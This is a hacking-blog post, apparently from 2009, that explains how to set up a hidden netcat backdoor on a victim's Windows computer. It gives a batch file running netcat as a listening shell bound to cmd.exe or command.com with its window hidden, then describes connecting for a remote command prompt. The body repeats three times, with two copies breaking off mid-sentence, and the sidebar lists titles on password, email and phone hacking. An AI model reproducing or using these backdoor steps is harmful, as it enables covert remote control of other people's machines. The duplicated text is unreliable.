What is netcat.
Netcat is a networking security tool from the l0pht and can be used to
set up backdoors (ways of returning from a compromised system).
Setting up backdoors.
We must first create a batch file using a simple line command. The line must contain:
nc -L -d -p -t -e cmd.exe
Then we will place the netcat executable (nc.exe) onto the C:\windows\system32 directory.
NOTE: We are talking about win 2000,NT,XP. This wont work on other OS. The reason is simple. Read below and learn.
Then we must place the batch file in the C:\windows\system32 directory and run it. Then we simply need to use a telnet or netcat to connect to our victem. I will explain it using netcat. Open DOS (start->run->cmd.exe) and type in:
C:\WINDOWS\> nc -v
Once you connected to that port on the victem's computer, you'll have a DOS prompt that you can give any command on the victem's computer.
NOTE: The backdoor will close whenever the victem shuts down their
computer. To get it running again, just run the batch file.
Explaining the batch command line.
* nc tells Windows to run the nc.exe file with the following arguments:
*
-L Tells netcat to not close and wait for connections
*
-d Tells netcat not to open a Window when running
*
-p Specifies a port to listen for a connection on
*
-t Tells netcat to accept telnet connections
*
-e Tells what program to run once the port is connected to
How to use it on win 95,98,ME.
First, put the nc.exe file in the c:\windows directory. Put the batch file there too, but this time change the batch command line to:
What is netcat.
Netcat is a networking security tool from the l0pht and can be used to
set up backdoors (ways of returning from a compromised system).
Setting up backdoors.
We must first create a batch file using a simple line command. The line must contain:
nc -L -d -p -t -e cmd.exe
Then we will place the netcat executable (nc.exe) onto the C:\windows\system32 directory.
NOTE: We are talking about win 2000,NT,XP. This wont work on other OS. The reason is simple. Read below and learn.
Then we must place the batch file in the C:\windows\system32 directory and run it. Then we simply need to use a telnet or netcat to connect to our victem. I will explain it using netcat. Open DOS (start->run->cmd.exe) and type in:
C:\WINDOWS\> nc -v
Once you connected to that port on the victem's computer, you'll have a DOS prompt that you can give any command on the victem's computer.
NOTE: The backdoor will close whenever the victem shuts down their
computer. To get it running again, just run the batch file.
Explaining the batch command line.
* nc tells Windows to run the nc.exe file with the following arguments:
*
-L Tells netcat to not close and wait for connections
*
-d Tells netcat not to open a Window when running
*
-p Specifies a port to listen for a connection on
*
-t Tells netcat to accept telnet connections
*
-e Tells what program to run once the port is connected to
How to use it on win 95,98,ME.
First, put the nc.exe file in the c:\windows directory. Put the batch file there too, but this time change the batch command line to:
What is netcat.
Netcat is a networking security tool from the l0pht and can be used to
set up backdoors (ways of returning from a compromised system).
Setting up backdoors.
We must first create a batch file using a simple line command. The line must contain:
nc -L -d -p -t -e cmd.exe
Then we will place the netcat executable (nc.exe) onto the C:\windows\system32 directory.
NOTE: We are talking about win 2000,NT,XP. This wont work on other OS. The reason is simple. Read below and learn.
Then we must place the batch file in the C:\windows\system32 directory and run it. Then we simply need to use a telnet or netcat to connect to our victem. I will explain it using netcat. Open DOS (start->run->cmd.exe) and type in:
C:\WINDOWS\> nc -v
Once you connected to that port on the victem's computer, you'll have a DOS prompt that you can give any command on the victem's computer.
NOTE: The backdoor will close whenever the victem shuts down their
computer. To get it running again, just run the batch file.
Explaining the batch command line.
* nc tells Windows to run the nc.exe file with the following arguments:
*
-L Tells netcat to not close and wait for connections
*
-d Tells netcat not to open a Window when running
*
-p Specifies a port to listen for a connection on
*
-t Tells netcat to accept telnet connections
*
-e Tells what program to run once the port is connected to
How to use it on win 95,98,ME.
First, put the nc.exe file in the c:\windows directory. Put the batch file there too, but this time change the batch command line to:
nc -L -d -p -t -e command.com
Ok, that should be work. The reason is simple. Win 95,98,ME doesnt use execute paths like NT does. If you wouldn't have put the files in System32 directory on NT, the program wouldn't have executed the batch file because it wouldn't have been in the file path - but you don't have to worry about that in 95,98,ME. The reason why we put the files in the c:\windows directory on 95,98,Me is because that's where the command.com file is - the MS-DOS Prompt file. (It's cmd.exe on NT,2000,XP). That's why we ran command.com instead of cmd.exe
Subscribe to:
Post Comments (Atom)
Counter
Labels
- About Domain Names (4)
- Android Hacks (2)
- Anti Yahoo booter (1)
- AOL hack (1)
- Broadband Hacking (5)
- Browser Tricks (1)
- Bsnl hack (1)
- Cell Phone Hacking (7)
- Computer hacks (24)
- Cracks/Serials (3)
- DataBase hacking (2)
- Defender (1)
- E-books for Hacking (4)
- Ethical hacking (15)
- Exciting Links.. (14)
- Facebook hack (2)
- FireFox hack (2)
- Free Downloadings (1)
- G-TALK Hacking (3)
- Gmail Hacking (2)
- Google Chrome (1)
- Google Hacking (2)
- Hack Airtel (5)
- Hack Vodafone (2)
- Hacking (62)
- Hotmail hack (3)
- Important Articles (16)
- Important Utility Softwares (35)
- Increase download speed (1)
- Innovations Articles (5)
- Intel Core i 7 (1)
- ip (2)
- ip hack (6)
- iPad (1)
- Key Logger (1)
- Lan Hacking (1)
- LInux (11)
- MegaUpload Hack (4)
- Mobile Hacks (14)
- Msn hacks (4)
- Nero (Linux) (1)
- Networking (6)
- Office (1)
- Operating Sysytems (24)
- Oracle 11g (2)
- Orkut goodies (3)
- Orkut Hacking (8)
- Password Hacking (6)
- phone unlocking (2)
- Programming softwares (3)
- Proxy (1)
- Proxy links (1)
- Rapid share hacks (10)
- Security (5)
- Skype hacking (1)
- Special Antiviruse (1)
- Theme for XP (3)
- Themes for Window 7 (1)
- Trojan (6)
- Usb Secuirty (3)
- Viruse (9)
- Website hacking (7)
- Windows 8 (2)
- Wireless Hacking (7)
- Xp Tweeks (5)
- Yahoo Hack (3)
- Yahoo messnger hack (6)
- You Tube Hack (1)
- Zapak hacking (4)
Followers
Blog Archive
-
▼
2009
(264)
-
▼
June
(61)
- New Airtel Hack for 100% free Sms
- Hack passwords with Cain and Abel
- How to find invisible users on Instant Messengers
- Rapidshare Premium link Generators (Unlimited down...
- Windows Vista Quattuor | 2.46 GBThis OS has been m...
- Windows Vista Black Eternity x86 (Genuine Version)
- 15 Tips to Improve your Linux Experience
- WEP Cracking, FBI Style( In Just 3 Minutes ) !
- Access Data of a Password Protected User in Window...
- How to safely uninstall Linux when Dual boot insta...
- How to convert Firefox into Fasterfox
- Gmail Account Hacking Tool
- Vodafone Hack for Free GPRS
- !!…Premium Accounts…!! { 16 Download Sites }
- DIY: Ripping off Windows XP using Backtrack Linux ...
- How do people boost download speed in LAN internet
- PicaSafe 2.0.207
- Nero (Linux)
- Virtual Plastic Surgery Software v.1.2
- SYMBIAN VIRUSES......
- Tools I Recommend -Must For All hackers
- The Viruse Make
- Latest Orkut hack(100% working)
- Samsung Mobile Service Center CODES
- Samsung D series hack
- Nokia All Codes
- MOTOROLLY CODES
- Mobile Secret Codes
- Mobile Cheat स्तुफ्फ NOKIA
- SAMSUNG SECRET CODES (NEW)
- BSNL hack for Internet
- Reliance Hack For free SMS
- Hack for Make FREE Calls.
- Hack Airtel Live to use Yahoo messenger for फ्री
- Mobile cheat codes fr all phones
- HowTo Use your mobile phone as a remote control fo...
- How to Make your own Linux
- Windows 7 Cheat Sheet
- Free Airtel GPRS using TeaShark Browser
- Connecting two buildings to one broadband service ...
- Build your own executable crypter
- Batch File To Disable Firewall-Windows Xp Sp2
- Tools to Automate rapid share Downloading
- Netcat Tips and Tricks
- Simple Batch Viruse explained
- How to create a backdoor using netcat
- Basics ARP Poison routing
- How does worm works
- WHAT IS CLICKJACKING
- Hack Airtel: Free Airtel Internet GPRS
- Airtel Hack for Broadband Internet- increase your ...
- Team Viewer
- Linux Mint 7 Gloria
- Why Is PCLinuxOS 2007 Better Than Ubuntu ?
- Invisible OS Boot Option - Hacking Grub
- Hacking an email
- How To Defend An Input Validation Attack
- For the Linux Novice
- Build your own network at home
- Autorun Viruse Killer!
- Make your USB drive free from virus
-
▼
June
(61)
Subscribe Via Email &Sms
Also Subscribe Via Sms Just click here to follow via
SMS
0 comments:
Post a Comment